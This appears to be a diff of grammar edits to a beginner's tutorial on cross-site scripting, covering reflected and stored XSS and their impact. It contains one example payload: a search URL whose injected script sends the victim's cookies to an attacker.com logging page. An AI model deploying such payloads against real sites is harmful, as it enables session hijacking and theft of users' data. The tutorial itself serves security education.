Introduction to Cross-Site Scripting

 - For Example, in an e-commerce website, there is a search box in which a user can search the items and the string written in the search box is visible in the URL of the website when the search request is sent to the server.

 - The attacker creates a link in which the malicious script is concatenated in the URL and sent it to the victim via email.
-When the victim opens that link then the request is sent to the malicious website of the attacker and all the browser data of the victim is hijacked and sent to the system of the attacker.
+When the victim opens that link, then the request is sent to the attacker’s malicious website, and all the browser data of the victim is hijacked and sent to the system of the attacker.

-- In Cross Site Scripting (XSS) vulnerability, the main motive of attacker is to steal the data of the user by running the malicious script in its browser which is injected in the website content which the user is using through different means.
+- In Cross-Site Scripting (XSS) vulnerability, the attacker’s main motive is to steal the user’s data by running the malicious script in its browser, which is injected into the website content which the user is using through different means.

-- For Example, when a user searches for some text in a website, then the request is sent to the server in the form:
+- For Example, when a user searches for some text on a website, then the request is sent to the server in the form:

 |https://www.abcwebsite.com/search=<script> document location=https://attacker.com/log.php?c=’ +encodeURIComponent(document.cookie)</script>|

-- In this way, an attacker injects its malicious script in the URL, Attacker can also store that script in the server which comes under Stored XSS.
+- In this way, an attacker injects its malicious script in the URL; the Attacker can also store that script in the server, which comes under Stored XSS.

 Impact of Cross-Site Scripting Vulnerabilities

-Impact of Cross Site Scripting varies a lot.
+The impact of Cross-Site Scripting varies a lot.
 After exploiting the XSS vulnerability, an attacker gains full control of the victim’s browser and can perform different actions that vary from small ones like viewing the browser history to disastrous ones like inserting worms in the computer.

 Some of the actions which the attacker can perform by exploiting the XSS vulnerability are as follows:-